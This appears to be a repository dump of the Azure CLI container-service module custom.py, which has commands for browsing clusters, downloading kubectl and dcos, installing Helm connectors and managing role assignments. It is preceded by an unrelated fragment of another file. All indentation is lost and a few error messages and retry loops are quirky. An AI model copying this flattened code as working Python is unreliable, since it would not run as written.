select = config.select().order_by(config.c.control_id)
result = conn.execute(select)
for row in result:
control = Control(name=row.control_name)
control.clean()
pass
pass
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
from ._helpers import _populate_api_server_access_profile, _set_load_balancer_sku, _set_vm_set_type
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2019_08_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2019_08_01.models import ManagedCluster
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterLoadBalancerProfile
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterLoadBalancerProfileManagedOutboundIPs
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterLoadBalancerProfileOutboundIPPrefixes
from azure.mgmt.containerservice.v2019_08_01.models import ManagedClusterLoadBalancerProfileOutboundIPs
from azure.mgmt.containerservice.v2019_08_01.models import AgentPool
from azure.mgmt.containerservice.v2019_08_01.models import ResourceReference
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_04_30.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_04_30.models import NetworkProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
# Validate the location upon the ACI avaiable regions
_validate_aci_location(norm_location)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
